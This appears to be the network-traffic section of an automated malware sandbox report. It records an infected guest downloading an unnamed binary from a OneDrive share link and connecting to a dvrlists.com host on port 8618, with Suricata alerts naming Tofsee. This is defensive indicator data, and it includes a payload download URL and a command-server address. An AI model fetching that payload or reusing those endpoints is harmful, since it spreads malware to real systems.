Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| twistednerd.dvrlists.com | 62.102.148.130 | |
| apv5oq.sn.files.1drv.com |
CNAME
sn-files.fe.1drv.com
CNAME
l-0003.l-msedge.net
|
13.107.42.12 |
| onedrive.live.com |
CNAME
l-0004.l-msedge.net
|
13.107.42.13 |
- TCP Requests
-
-
192.168.56.101:49201 13.107.42.12:443apv5oq.sn.files.1drv.com
-
192.168.56.101:49202 13.107.42.12:443apv5oq.sn.files.1drv.com
-
192.168.56.101:49200 13.107.42.13:443onedrive.live.com
-
192.168.56.101:49204 62.102.148.130:8618twistednerd.dvrlists.com
-
192.168.56.101:49212 62.102.148.130:8618twistednerd.dvrlists.com
-
192.168.56.101:49213 62.102.148.130:8618twistednerd.dvrlists.com
-
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62327 239.255.255.250:1900
-
192.168.56.101:62329 239.255.255.250:3702
-
192.168.56.101:62331 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
302
https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ
REQUEST
RESPONSE
BODY
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ HTTP/1.1
User-Agent: zipo
Host: onedrive.live.com
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://apv5oq.sn.files.1drv.com/y4mqtDxi_yjQqMj7aLneNR5K2ag2n6a9B3s2vsguKxD6cq_pEbf-AoBavtlpqHoxXjnVTTRodHYAyAVwV2qMV3yT9FJF0ReIQscZaXQGrtQ_Qo0ZTxor0a01qx5w-nMorDgI-I4bWaoFPlMR2GfVgFSbCIl6ErQU5_nxjDMV0u2rSp5S7Vf6y3eFgoL5jbcc9J171z-sNGiboKZE27hENWiuQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1
Set-Cookie: E=P:YJezxdtb2Yg=:vhIzSlHsxS8fgnwcJOh1nwq8V0/MNyxvLo5dU1VCct0=:F; domain=.live.com; path=/
Set-Cookie: xid=af875ddc-712a-456d-858d-4a4b145ed8ed&&RD00155D7D6A9D&266; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 10-Aug-2021 07:09:32 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 17-Aug-2021 08:49:32 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RD00155D7D6A9D
X-ODWebServer: canadacentral1-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: E1A0BF7E64E6429291F8CA8DB1B342E6 Ref B: SLAEDGE1112 Ref C: 2021-08-10T08:49:32Z
Date: Tue, 10 Aug 2021 08:49:32 GMT
Content-Length: 0
GET
200
https://apv5oq.sn.files.1drv.com/y4mqtDxi_yjQqMj7aLneNR5K2ag2n6a9B3s2vsguKxD6cq_pEbf-AoBavtlpqHoxXjnVTTRodHYAyAVwV2qMV3yT9FJF0ReIQscZaXQGrtQ_Qo0ZTxor0a01qx5w-nMorDgI-I4bWaoFPlMR2GfVgFSbCIl6ErQU5_nxjDMV0u2rSp5S7Vf6y3eFgoL5jbcc9J171z-sNGiboKZE27hENWiuQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1
REQUEST
RESPONSE
BODY
GET /y4mqtDxi_yjQqMj7aLneNR5K2ag2n6a9B3s2vsguKxD6cq_pEbf-AoBavtlpqHoxXjnVTTRodHYAyAVwV2qMV3yT9FJF0ReIQscZaXQGrtQ_Qo0ZTxor0a01qx5w-nMorDgI-I4bWaoFPlMR2GfVgFSbCIl6ErQU5_nxjDMV0u2rSp5S7Vf6y3eFgoL5jbcc9J171z-sNGiboKZE27hENWiuQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1 HTTP/1.1
User-Agent: zipo
Host: apv5oq.sn.files.1drv.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 579584
Content-Type: application/octet-stream
Content-Location: https://apv5oq.sn.files.1drv.com/y4mjpi6faKocZEqgEXfBOsjelLVDdAruqiWVYF0koaTv2f3oSGjqjbA-jRn3D3-XDxmobFUTH-APRDkfD1qfEvReT6yGLNI-APgrfZXZBKTdDGNkOxw3nkZ2HxdDy69Wd9WMgR_vVxDrAj822BuujhEjM1QpaslBPkJWRrS0JRtJiS0sRZsknCM8uklMp8exqXR
Expires: Mon, 08 Nov 2021 08:49:33 GMT
Last-Modified: Mon, 09 Aug 2021 18:37:33 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!117.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN4PPF20918D903
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: 7ABtSnRotkyrk/lORhijoQ.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITExNy4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Yjjdwkjkodghbmfmluytpeybrgxrlom"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.725.719.2003
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 0AD930B49BBA4BFAA520009619BC14AF Ref B: SLAEDGE1019 Ref C: 2021-08-10T08:49:32Z
Date: Tue, 10 Aug 2021 08:49:33 GMT
GET
302
https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ
REQUEST
RESPONSE
BODY
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ HTTP/1.1
User-Agent: aswe
Host: onedrive.live.com
Cache-Control: no-cache
Cookie: E=P:YJezxdtb2Yg=:vhIzSlHsxS8fgnwcJOh1nwq8V0/MNyxvLo5dU1VCct0=:F; xid=af875ddc-712a-456d-858d-4a4b145ed8ed&&RD00155D7D6A9D&266; xidseq=1; wla42=
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://apv5oq.sn.files.1drv.com/y4muXeUmSOr2eA8OAZv22ApcwBCduBInlnDD_iP2ohqHowwtZcujQFarcs7juK_0mSRbt6MJSbKteWevTHBIgiv6lJwPrMTfvY1ZebPr11dv0Jj63I1RU3a9kMWmQKSmYqgZFh1LLe2fAR8EZ-z8j-pWLadKuq6Z3fIVgXk84emHccp7oVXqMPta0w5zmX9fkWNqjQ12SMYb696eSzEeW3MLQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1
Set-Cookie: E=P:P0drxttb2Yg=:iMsrl4GAWYyDys5dkYHZdwpkjRqUorWfnECnwb/8J8k=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 10-Aug-2021 07:09:33 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 17-Aug-2021 08:49:33 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RD00155D7D9F1D
X-ODWebServer: canadacentral1-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 215DAB3EDEF74E8B864B8BF69AE0243B Ref B: SLAEDGE1112 Ref C: 2021-08-10T08:49:33Z
Date: Tue, 10 Aug 2021 08:49:33 GMT
Content-Length: 0
GET
200
https://apv5oq.sn.files.1drv.com/y4muXeUmSOr2eA8OAZv22ApcwBCduBInlnDD_iP2ohqHowwtZcujQFarcs7juK_0mSRbt6MJSbKteWevTHBIgiv6lJwPrMTfvY1ZebPr11dv0Jj63I1RU3a9kMWmQKSmYqgZFh1LLe2fAR8EZ-z8j-pWLadKuq6Z3fIVgXk84emHccp7oVXqMPta0w5zmX9fkWNqjQ12SMYb696eSzEeW3MLQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1
REQUEST
RESPONSE
BODY
GET /y4muXeUmSOr2eA8OAZv22ApcwBCduBInlnDD_iP2ohqHowwtZcujQFarcs7juK_0mSRbt6MJSbKteWevTHBIgiv6lJwPrMTfvY1ZebPr11dv0Jj63I1RU3a9kMWmQKSmYqgZFh1LLe2fAR8EZ-z8j-pWLadKuq6Z3fIVgXk84emHccp7oVXqMPta0w5zmX9fkWNqjQ12SMYb696eSzEeW3MLQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1 HTTP/1.1
User-Agent: aswe
Host: apv5oq.sn.files.1drv.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 579584
Content-Type: application/octet-stream
Content-Location: https://apv5oq.sn.files.1drv.com/y4mjpi6faKocZEqgEXfBOsjelLVDdAruqiWVYF0koaTv2f3oSGjqjbA-jRn3D3-XDxmobFUTH-APRDkfD1qfEvReT6yGLNI-APgrfZXZBKTdDGNkOxw3nkZ2HxdDy69Wd9WMgR_vVxDrAj822BuujhEjM1QpaslBPkJWRrS0JRtJiS0sRZsknCM8uklMp8exqXR
Expires: Mon, 08 Nov 2021 08:49:34 GMT
Last-Modified: Mon, 09 Aug 2021 18:37:33 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!117.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN3PPF38F0428E6
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: YrXhHXENW0KjJTTTyWrIjw.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITExNy4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Yjjdwkjkodghbmfmluytpeybrgxrlom"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.725.719.2003
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 84DC09E93AE54BFFB1D9E34D962F8AEB Ref B: SLAEDGE1116 Ref C: 2021-08-10T08:49:33Z
Date: Tue, 10 Aug 2021 08:49:33 GMT
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49201 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.101:49200 -> 13.107.42.13:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.101:49202 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.101:49201 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
|
TLSv1 192.168.56.101:49200 13.107.42.13:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | CN=onedrive.com | 24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de |
|
TLSv1 192.168.56.101:49202 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
|
TLS 1.3 192.168.56.101:49213 62.102.148.130:8618 |
None | None | None |
|
TLS 1.3 192.168.56.101:49204 62.102.148.130:8618 |
None | None | None |
|
TLS 1.3 192.168.56.101:49212 62.102.148.130:8618 |
None | None | None |
Snort Alerts
No Snort Alerts